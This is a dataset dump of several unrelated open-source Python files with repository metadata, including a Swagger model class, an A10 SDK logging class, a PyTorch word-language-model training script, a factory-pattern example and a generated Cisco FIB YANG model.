class Resource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'identifier': 'str',
'name': 'str'
}
attribute_map = {
'identifier': 'identifier',
'name': 'name'
}
def __init__(self, identifier=None, name=None):
"""
Resource - a model defined in Swagger
"""
self._identifier = None
self._name = None
if identifier is not None:
self.identifier = identifier
if name is not None:
self.name = name
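# Example (illustrative):
#   Resource(identifier='buckets/1234', name='My Bucket').to_dict()
#   -> {'identifier': 'buckets/1234', 'name': 'My Bucket'}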
@property
def identifier(self):
"""
Gets the identifier of this Resource.
The identifier of the resource.
:return: The identifier of this Resource.
:rtype: str
"""
return self._identifier
@identifier.setter
def identifier(self, identifier):
"""
Sets the identifier of this Resource.
The identifier of the resource.
:param identifier: The identifier of this Resource.
:type: str
"""
self._identifier = identifier
@property
def name(self):
"""
Gets the name of this Resource.
The name of the resource.
:return: The name of this Resource.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this Resource.
The name of the resource.
:param name: The name of this Resource.
:type: str
"""
self._name = name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, Resource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 24.357143 | 127 | 0.53799 |
3950b599fc72a2dc295e2e7ac1546a871dd9102a | 1,690 | py | Python | a10sdk/core/logging/logging_email_filter.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 16 | 2015-05-20T07:26:30.000Z | 2021-01-23T11:56:57.000Z | a10sdk/core/logging/logging_email_filter.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 6 | 2015-03-24T22:07:11.000Z | 2017-03-28T21:31:18.000Z | a10sdk/core/logging/logging_email_filter.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 23 | 2015-03-29T15:43:01.000Z | 2021-06-02T17:12:01.000Z | from a10sdk.common.A10BaseClass import A10BaseClass
class Filter(A10BaseClass):
"""Class Description::
Logging via email filter settings.
Class filter supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param filter_id: {"description": "Logging via email filter settings", "format": "number", "type": "number", "maximum": 8, "minimum": 1, "optional": false}
:param trigger: {"default": 0, "optional": true, "type": "number", "description": "Trigger email, override buffer settings", "format": "flag"}
:param expression: {"description": "Reverse Polish Notation, consists of level 0-7, module AFLEX/HMON/..., pattern log-content-pattern, and or/and/not", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 511, "type": "string"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/logging/email/filter/{filter_id}`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required = [ "filter_id"]
self.b_key = "filter"
self.a10_url="/axapi/v3/logging/email/filter/{filter_id}"
self.DeviceProxy = ""
self.filter_id = ""
self.trigger = ""
self.expression = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
| 39.302326 | 250 | 0.642012 |
663399fc6a136ba9c5bbad123a56724e2c7c8044 | 10,722 | py | Python | examples/duet/word_language_model/original/main.py | godormad/PySyft | fcb3374b6318dcccf377175fb8db6f70e9e1d1e3 | [
"Apache-2.0"
] | 1 | 2020-12-22T17:22:13.000Z | 2020-12-22T17:22:13.000Z | examples/duet/word_language_model/original/main.py | godormad/PySyft | fcb3374b6318dcccf377175fb8db6f70e9e1d1e3 | [
"Apache-2.0"
] | null | null | null | examples/duet/word_language_model/original/main.py | godormad/PySyft | fcb3374b6318dcccf377175fb8db6f70e9e1d1e3 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# stdlib
import argparse
import math
import os
import time
# third party
import data
import model
import torch
import torch.nn as nn
import torch.onnx
parser = argparse.ArgumentParser(
description="PyTorch Wikitext-2 RNN/LSTM/GRU/Transformer Language Model"
)
parser.add_argument(
"--data",
type=str,
default="./data/wikitext-2",
help="location of the data corpus; default: \"./data/wikitext-2\""
)
parser.add_argument(
"--model",
type=str,
default="LSTM",
help="type of recurrent net (RNN_TANH, RNN_RELU, LSTM, GRU, Transformer); default: \"LSTM\"",
)
parser.add_argument(
"--emsize",
type=int,
default=200,
help="size of word embeddings; default: 200"
)
parser.add_argument(
"--nhid",
type=int,
default=200,
help="number of hidden units per layer; default: 200"
)
parser.add_argument(
"--nlayers",
type=int,
default=2,
help="number of layers; default: 2"
)
parser.add_argument(
"--lr",
type=float,
default=20,
help="initial learning rate; default: 20"
)
parser.add_argument(
"--clip",
type=float,
default=0.25,
help="gradient clipping; default: 0.25"
)
parser.add_argument(
"--epochs",
type=int,
default=40,
help="upper epoch limit; default: 40"
)
parser.add_argument(
"--batch_size",
type=int,
default=20,
metavar="N",
help="batch size; default: 20"
)
parser.add_argument(
"--bptt",
type=int,
default=35,
help="sequence length; default: 35"
)
parser.add_argument(
"--dropout",
type=float,
default=0.2,
help="dropout applied to layers (0 = no dropout); default: 0.2",
)
parser.add_argument(
"--tied",
action="store_true",
help="tie the word embedding and softmax weights"
)
parser.add_argument(
"--seed",
type=int,
default=1111,
help="random seed; default: 1111"
)
parser.add_argument(
"--cuda",
action="store_true",
help="use CUDA"
)
parser.add_argument(
"--log-interval",
type=int,
default=200,
metavar="N",
help="report interval; default: 200"
)
parser.add_argument(
"--save",
type=str,
default="model.pt",
help="path to save the final model; default: \"model.pt\""
)
parser.add_argument(
"--onnx-export",
type=str,
default="",
help="path to export the final model in onnx format; default: ''",
)
parser.add_argument(
"--nhead",
type=int,
default=2,
help="the number of heads in the encoder/decoder of the transformer model; default: 2",
)
parser.add_argument(
"--dry-run",
action="store_true",
help="verify the code and the model"
)
args = parser.parse_args()
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
device = torch.device("cuda" if args.cuda else "cpu")
###############################################################################
# Load data
###############################################################################
corpus = data.Corpus(args.data)
# Starting from sequential data, batchify arranges the dataset into columns.
# For instance, with the alphabet as the sequence and batch size 4, we'd get
# ┌ a g m s ┐
# │ b h n t │
# │ c i o u │
# │ d j p v │
# │ e k q w │
# └ f l r x ┘.
# These columns are treated as independent by the model, which means that the
# dependence of e. g. 'g' on 'f' can not be learned, but allows more efficient
# batch processing.
def batchify(data, bsz):
# Work out how cleanly we can divide the dataset into bsz parts.
nbatch = data.size(0) // bsz
# Trim off any extra elements that wouldn't cleanly fit (remainders).
data = data.narrow(0, 0, nbatch * bsz)
# Evenly divide the data across the bsz batches.
data = data.view(bsz, -1).t().contiguous()
return data.to(device)
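# Worked example (illustrative): with the 26-letter alphabet and bsz=4,
# nbatch = 26 // 4 = 6, the trailing "y z" are trimmed, and the remaining 24
# tokens are reshaped to 4 rows of 6 and transposed into the 6 x 4 matrix
# drawn in the comment above.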
eval_batch_size = 10
train_data = batchify(corpus.train, args.batch_size)
val_data = batchify(corpus.valid, eval_batch_size)
test_data = batchify(corpus.test, eval_batch_size)
###############################################################################
# Build the model
###############################################################################
ntokens = len(corpus.dictionary)
if args.model == "Transformer":
model = model.TransformerModel(
ntokens, args.emsize, args.nhead, args.nhid, args.nlayers, args.dropout
).to(device)
else:
model = model.RNNModel(
args.model,
ntokens,
args.emsize,
args.nhid,
args.nlayers,
args.dropout,
args.tied,
).to(device)
criterion = nn.NLLLoss()
###############################################################################
# Training code
###############################################################################
def repackage_hidden(h):
"""Wraps hidden states in new Tensors, to detach them from their history."""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
# get_batch subdivides the source data into chunks of length args.bptt.
# If source is equal to the example output of the batchify function, with
# a bptt-limit of 2, we'd get the following two Variables for i = 0:
# ┌ a g m s ┐ ┌ b h n t ┐
# └ b h n t ┘ └ c i o u ┘
# Note that despite the name of the function, the subdivision of data is not
# done along the batch dimension (i.e. dimension 1), since that was handled
# by the batchify function. The chunks are along dimension 0, corresponding
# to the seq_len dimension in the LSTM.
def get_batch(source, i):
seq_len = min(args.bptt, len(source) - 1 - i)
data = source[i : i + seq_len]
target = source[i + 1 : i + 1 + seq_len].view(-1)
return data, target
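# Worked example (illustrative): with bptt=2 and i=0 on the batchified alphabet
# above, data is rows 0..1 ("a g m s" / "b h n t") and target is rows 1..2
# flattened ("b h n t c i o u"), i.e. each target token is the next token in
# its own column.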
def evaluate(data_source):
# Turn on evaluation mode which disables dropout.
model.eval()
total_loss = 0.0
ntokens = len(corpus.dictionary)
if args.model != "Transformer":
hidden = model.init_hidden(eval_batch_size)
with torch.no_grad():
for i in range(0, data_source.size(0) - 1, args.bptt):
data, targets = get_batch(data_source, i)
if args.model == "Transformer":
output = model(data)
output = output.view(-1, ntokens)
else:
output, hidden = model(data, hidden)
hidden = repackage_hidden(hidden)
total_loss += len(data) * criterion(output, targets).item()
return total_loss / (len(data_source) - 1)
def train():
# Turn on training mode which enables dropout.
model.train()
total_loss = 0.0
start_time = time.time()
ntokens = len(corpus.dictionary)
if args.model != "Transformer":
hidden = model.init_hidden(args.batch_size)
for batch, i in enumerate(range(0, train_data.size(0) - 1, args.bptt)):
data, targets = get_batch(train_data, i)
# Starting each batch, we detach the hidden state from how it was previously produced.
# If we didn't, the model would try backpropagating all the way to start of the dataset.
model.zero_grad()
if args.model == "Transformer":
output = model(data)
output = output.view(-1, ntokens)
else:
hidden = repackage_hidden(hidden)
output, hidden = model(data, hidden)
loss = criterion(output, targets)
loss.backward()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
for p in model.parameters():
p.data.add_(p.grad, alpha=-lr)
total_loss += loss.item()
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss / args.log_interval
elapsed = time.time() - start_time
print(
"| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | ms/batch {:5.2f} | "
"loss {:5.2f} | ppl {:8.2f}".format(
epoch,
batch,
len(train_data) // args.bptt,
lr,
elapsed * 1000 / args.log_interval,
cur_loss,
math.exp(cur_loss),
)
)
total_loss = 0
start_time = time.time()
if args.dry_run:
break
def export_onnx(path, batch_size, seq_len):
print(
"The model is also exported in ONNX format at {}".format(
os.path.realpath(args.onnx_export)
)
)
model.eval()
dummy_input = (
torch.LongTensor(seq_len * batch_size).zero_().view(-1, batch_size).to(device)
)
hidden = model.init_hidden(batch_size)
torch.onnx.export(model, (dummy_input, hidden), path)
# Loop over epochs.
lr = args.lr
best_val_loss = None
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(1, args.epochs + 1):
epoch_start_time = time.time()
train()
val_loss = evaluate(val_data)
print("-" * 89)
print(
"| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.2f} | "
"valid ppl {:8.2f}".format(
epoch, (time.time() - epoch_start_time), val_loss, math.exp(val_loss)
)
)
print("-" * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
with open(args.save, "wb") as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
print("-" * 89)
print("Exiting from training early")
# Load the best saved model.
with open(args.save, "rb") as f:
model = torch.load(f)
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
# Currently, only rnn model supports flatten_parameters function.
if args.model in ["RNN_TANH", "RNN_RELU", "LSTM", "GRU"]:
model.rnn.flatten_parameters()
# Run on test data.
test_loss = evaluate(test_data)
print("=" * 89)
print(
"| End of training | test loss {:5.2f} | test ppl {:8.2f}".format(
test_loss, math.exp(test_loss)
)
)
print("=" * 89)
if len(args.onnx_export) > 0:
# Export the model in ONNX format.
export_onnx(args.onnx_export, batch_size=1, seq_len=args.bptt)
| 29.056911 | 97 | 0.592613 |
831e487ac073eea4a8131b23e5b526eaa67e5298 | 771 | py | Python | creational-patterns/factory.py | someshchaturvedi/pythonic-design-patterns | 74ef0b1ad233bdf9f75f86afa1b8874228d88429 | [
"MIT"
] | 1 | 2018-08-02T12:16:20.000Z | 2018-08-02T12:16:20.000Z | creational-patterns/factory.py | someshchaturvedi/pythonic-design-patterns | 74ef0b1ad233bdf9f75f86afa1b8874228d88429 | [
"MIT"
] | null | null | null | creational-patterns/factory.py | someshchaturvedi/pythonic-design-patterns | 74ef0b1ad233bdf9f75f86afa1b8874228d88429 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
class Phone(ABC):
@abstractmethod
def name(self):
pass
class ApplePhone(Phone):
def name(self):
print('apple phone')
class SamsungPhone(Phone):
def name(self):
print('samsung phone')
class Company(ABC):
def get_phone(self):
return self.phone_factory()
@abstractmethod
def phone_factory(self):
pass
class AppleCompany(Company):
def phone_factory(self):
return ApplePhone()
class SamsungCompany(Company):
def phone_factory(self):
return SamsungPhone()
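# Factory Method in brief: Company.get_phone() holds the shared "creator" logic,
# while phone_factory() is the hook each concrete company overrides, so the base
# class never needs to know which Phone subclass it instantiates.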
if __name__ == '__main__':
apple_company = AppleCompany()
apple_company.get_phone().name()
samsung_company = SamsungCompany()
samsung_company.get_phone().name()
| 17.133333 | 38 | 0.661479 |
79aafe4ef32c5d30a33784ad089b6d6a12ae3822 | 15,791 | py | Python | cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_fib_oper.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_fib_oper.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_fib_oper.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-07-22T04:04:44.000Z | 2020-07-22T04:04:44.000Z | """ Cisco_IOS_XE_fib_oper
This module contains a collection of YANG definitions
for IOS\-XE FIB operational data.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EncapsulationHeaderType(Enum):
"""
EncapsulationHeaderType (Enum Class)
Types of header for packet encapsulation
.. data:: encap_hdr_type_unknown = 0
Unknown encapsulation header type
.. data:: encap_hdr_type_gre = 1
GRE encapsulation header type
.. data:: encap_hdr_type_ipv4 = 2
IPv4 encapsulation header type
.. data:: encap_hdr_type_ipv6 = 3
IPv6 encapsulation header type
.. data:: encap_hdr_type_mpls = 4
MPLS encapsulation header type
"""
encap_hdr_type_unknown = Enum.YLeaf(0, "encap-hdr-type-unknown")
encap_hdr_type_gre = Enum.YLeaf(1, "encap-hdr-type-gre")
encap_hdr_type_ipv4 = Enum.YLeaf(2, "encap-hdr-type-ipv4")
encap_hdr_type_ipv6 = Enum.YLeaf(3, "encap-hdr-type-ipv6")
encap_hdr_type_mpls = Enum.YLeaf(4, "encap-hdr-type-mpls")
class FibAddressFamily(Enum):
"""
FibAddressFamily (Enum Class)
FIB Address Family Types
.. data:: fib_addr_fam_unknown = 0
Unknown Address Family
.. data:: fib_addr_fam_ipv4 = 1
IPv4 Address Family
.. data:: fib_addr_fam_ipv6 = 2
IPv6 Address Family
"""
fib_addr_fam_unknown = Enum.YLeaf(0, "fib-addr-fam-unknown")
fib_addr_fam_ipv4 = Enum.YLeaf(1, "fib-addr-fam-ipv4")
fib_addr_fam_ipv6 = Enum.YLeaf(2, "fib-addr-fam-ipv6")
class FibPathType(Enum):
"""
FibPathType (Enum Class)
Type of FIB path used
.. data:: fib_path_type_unknown = 0
Unknown FIB path type
.. data:: fib_path_type_receive = 1
Receive FIB path type
.. data:: fib_path_type_connected = 2
Connected FIB path type
.. data:: fib_path_type_attached_prefix = 3
Attached Prefix FIB path type
.. data:: fib_path_type_attached_host = 4
Attached Host FIB path type
.. data:: fib_path_type_attached_nexthop = 5
Attached Nexthop FIB path type
.. data:: fib_path_type_recursive = 6
Recursive FIB path type
.. data:: fib_path_type_adjacency_prefix = 7
Adjacency Prefix FIB path type
.. data:: fib_path_type_special_prefix = 8
Special Prefix FIB path type
"""
fib_path_type_unknown = Enum.YLeaf(0, "fib-path-type-unknown")
fib_path_type_receive = Enum.YLeaf(1, "fib-path-type-receive")
fib_path_type_connected = Enum.YLeaf(2, "fib-path-type-connected")
fib_path_type_attached_prefix = Enum.YLeaf(3, "fib-path-type-attached-prefix")
fib_path_type_attached_host = Enum.YLeaf(4, "fib-path-type-attached-host")
fib_path_type_attached_nexthop = Enum.YLeaf(5, "fib-path-type-attached-nexthop")
fib_path_type_recursive = Enum.YLeaf(6, "fib-path-type-recursive")
fib_path_type_adjacency_prefix = Enum.YLeaf(7, "fib-path-type-adjacency-prefix")
fib_path_type_special_prefix = Enum.YLeaf(8, "fib-path-type-special-prefix")
class FibOperData(Entity):
"""
This module contains a collection of YANG definitions for
monitoring the operation of IOS\-XE CEF.
Copyright (c) 2016\-2017 by Cisco Systems, Inc.
All rights reserved.
.. attribute:: fib_ni_entry
FIB Network Instances
**type**\: list of :py:class:`FibNiEntry <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibOperData.FibNiEntry>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData, self).__init__()
self._top_entity = None
self.yang_name = "fib-oper-data"
self.yang_parent_name = "Cisco-IOS-XE-fib-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("fib-ni-entry", ("fib_ni_entry", FibOperData.FibNiEntry))])
self._leafs = OrderedDict()
self.fib_ni_entry = YList(self)
self._segment_path = lambda: "Cisco-IOS-XE-fib-oper:fib-oper-data"
def __setattr__(self, name, value):
self._perform_setattr(FibOperData, [], name, value)
class FibNiEntry(Entity):
"""
FIB Network Instances
.. attribute:: instance_name (key)
Instance Name
**type**\: str
.. attribute:: af
Address Family
**type**\: :py:class:`FibAddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibAddressFamily>`
.. attribute:: num_pfx
Number of prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: num_pfx_fwd
Number of forwarding prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: num_pfx_non_fwd
Number of non\-forwarding prefixes
**type**\: int
**range:** 0..4294967295
.. attribute:: fib_entries
List of FIB entries
**type**\: list of :py:class:`FibEntries <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibOperData.FibNiEntry.FibEntries>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData.FibNiEntry, self).__init__()
self.yang_name = "fib-ni-entry"
self.yang_parent_name = "fib-oper-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['instance_name']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("fib-entries", ("fib_entries", FibOperData.FibNiEntry.FibEntries))])
self._leafs = OrderedDict([
('instance_name', YLeaf(YType.str, 'instance-name')),
('af', YLeaf(YType.enumeration, 'af')),
('num_pfx', YLeaf(YType.uint32, 'num-pfx')),
('num_pfx_fwd', YLeaf(YType.uint32, 'num-pfx-fwd')),
('num_pfx_non_fwd', YLeaf(YType.uint32, 'num-pfx-non-fwd')),
])
self.instance_name = None
self.af = None
self.num_pfx = None
self.num_pfx_fwd = None
self.num_pfx_non_fwd = None
self.fib_entries = YList(self)
self._segment_path = lambda: "fib-ni-entry" + "[instance-name='" + str(self.instance_name) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-fib-oper:fib-oper-data/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(FibOperData.FibNiEntry, ['instance_name', 'af', 'num_pfx', 'num_pfx_fwd', 'num_pfx_non_fwd'], name, value)
class FibEntries(Entity):
"""
List of FIB entries
.. attribute:: ip_addr (key)
IP address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
.. attribute:: instance_name
Instance Name
**type**\: str
.. attribute:: af
Address Family
**type**\: :py:class:`FibAddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibAddressFamily>`
.. attribute:: num_paths
Number of Paths available
**type**\: int
**range:** 0..255
.. attribute:: packets_forwarded
Packets forwarded through this entry
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: octets_forwarded
Octets forwarded through this entry
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: fib_nexthop_entries
List of FIB next\-hop entries
**type**\: list of :py:class:`FibNexthopEntries <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibOperData.FibNiEntry.FibEntries.FibNexthopEntries>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData.FibNiEntry.FibEntries, self).__init__()
self.yang_name = "fib-entries"
self.yang_parent_name = "fib-ni-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['ip_addr']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("fib-nexthop-entries", ("fib_nexthop_entries", FibOperData.FibNiEntry.FibEntries.FibNexthopEntries))])
self._leafs = OrderedDict([
('ip_addr', YLeaf(YType.str, 'ip-addr')),
('instance_name', YLeaf(YType.str, 'instance-name')),
('af', YLeaf(YType.enumeration, 'af')),
('num_paths', YLeaf(YType.uint8, 'num-paths')),
('packets_forwarded', YLeaf(YType.uint64, 'packets-forwarded')),
('octets_forwarded', YLeaf(YType.uint64, 'octets-forwarded')),
])
self.ip_addr = None
self.instance_name = None
self.af = None
self.num_paths = None
self.packets_forwarded = None
self.octets_forwarded = None
self.fib_nexthop_entries = YList(self)
self._segment_path = lambda: "fib-entries" + "[ip-addr='" + str(self.ip_addr) + "']"
def __setattr__(self, name, value):
self._perform_setattr(FibOperData.FibNiEntry.FibEntries, ['ip_addr', 'instance_name', 'af', 'num_paths', 'packets_forwarded', 'octets_forwarded'], name, value)
class FibNexthopEntries(Entity):
"""
List of FIB next\-hop entries
.. attribute:: nh_addr (key)
IP Address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
.. attribute:: index
Unique Next\-hop Path Index
**type**\: int
**range:** 0..4294967295
.. attribute:: af
Address Family
**type**\: :py:class:`FibAddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibAddressFamily>`
.. attribute:: ifname
Output Interface Name
**type**\: str
.. attribute:: path_type
FIB path type
**type**\: :py:class:`FibPathType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.FibPathType>`
.. attribute:: path_id
Unique Next\-hop Path Index
**type**\: int
**range:** 0..4294967295
.. attribute:: weight
Next\-hop weight
**type**\: int
**range:** 0..255
.. attribute:: encap
Encap Header Type
**type**\: :py:class:`EncapsulationHeaderType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.EncapsulationHeaderType>`
.. attribute:: decap
Decap Header Type
**type**\: :py:class:`EncapsulationHeaderType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper.EncapsulationHeaderType>`
"""
_prefix = 'fib-ios-xe-oper'
_revision = '2017-07-04'
def __init__(self):
super(FibOperData.FibNiEntry.FibEntries.FibNexthopEntries, self).__init__()
self.yang_name = "fib-nexthop-entries"
self.yang_parent_name = "fib-entries"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nh_addr']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('nh_addr', YLeaf(YType.str, 'nh-addr')),
('index', YLeaf(YType.uint32, 'index')),
('af', YLeaf(YType.enumeration, 'af')),
('ifname', YLeaf(YType.str, 'ifname')),
('path_type', YLeaf(YType.enumeration, 'path-type')),
('path_id', YLeaf(YType.uint32, 'path-id')),
('weight', YLeaf(YType.uint8, 'weight')),
('encap', YLeaf(YType.enumeration, 'encap')),
('decap', YLeaf(YType.enumeration, 'decap')),
])
self.nh_addr = None
self.index = None
self.af = None
self.ifname = None
self.path_type = None
self.path_id = None
self.weight = None
self.encap = None
self.decap = None
self._segment_path = lambda: "fib-nexthop-entries" + "[nh-addr='" + str(self.nh_addr) + "']"
def __setattr__(self, name, value):
self._perform_setattr(FibOperData.FibNiEntry.FibEntries.FibNexthopEntries, ['nh_addr', 'index', 'af', 'ifname', 'path_type', 'path_id', 'weight', 'encap', 'decap'], name, value)
def clone_ptr(self):
self._top_entity = FibOperData()
return self._top_entity
| 34.105832 | 299 | 0.524793 |
81d600188a7510dffd890a3808730f64c0ea6089 | 880 | py | Python | python/tests/transformers/named_image_VGG16_test.py | flysky1991/spark-deep-learning | 36e9b105f8df57680f8cf7cb112125d555a14ce9 | [
"Apache-2.0"
] | 1 | 2019-02-25T15:02:19.000Z | 2019-02-25T15:02:19.000Z | python/tests/transformers/named_image_VGG16_test.py | jennifer19/spark-deep-learning | e3c5876fb610ede37e43716a5c3cfd76a5a8464b | [
"Apache-2.0"
] | null | null | null | python/tests/transformers/named_image_VGG16_test.py | jennifer19/spark-deep-learning | e3c5876fb610ede37e43716a5c3cfd76a5a8464b | [
"Apache-2.0"
] | 2 | 2020-02-08T06:51:36.000Z | 2020-06-18T05:38:09.000Z | # Copyright 2017 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from .named_image_test import NamedImageTransformerBaseTestCase
class NamedImageTransformerVGG16Test(NamedImageTransformerBaseTestCase):
__test__ = os.getenv('RUN_ONLY_LIGHT_TESTS', False) != "True"
name = "VGG16"
numPartitionsOverride = 1 # hits OOM if more than 2 threads
| 36.666667 | 74 | 0.770455 |
85472deba06c689b7b7973af427e23561ab49f2a | 7,233 | py | Python | homeassistant/components/nam/const.py | nickna/core | c682d5d5e430de52e3da7e06026cd8b4087e864f | [
"Apache-2.0"
] | 5 | 2019-02-24T11:46:18.000Z | 2019-05-28T17:37:21.000Z | homeassistant/components/nam/const.py | flexy2dd/core | 1019ee22ff13e5f542e868179d791e6a0d87369a | [
"Apache-2.0"
] | 77 | 2020-07-16T16:43:09.000Z | 2022-03-31T06:14:37.000Z | homeassistant/components/nam/const.py | Vaarlion/core | f3de8b9f28de01abf72c0f5bb0b457eb1841f201 | [
"Apache-2.0"
] | 1 | 2020-03-09T19:15:38.000Z | 2020-03-09T19:15:38.000Z | """Constants for Nettigo Air Monitor integration."""
from __future__ import annotations
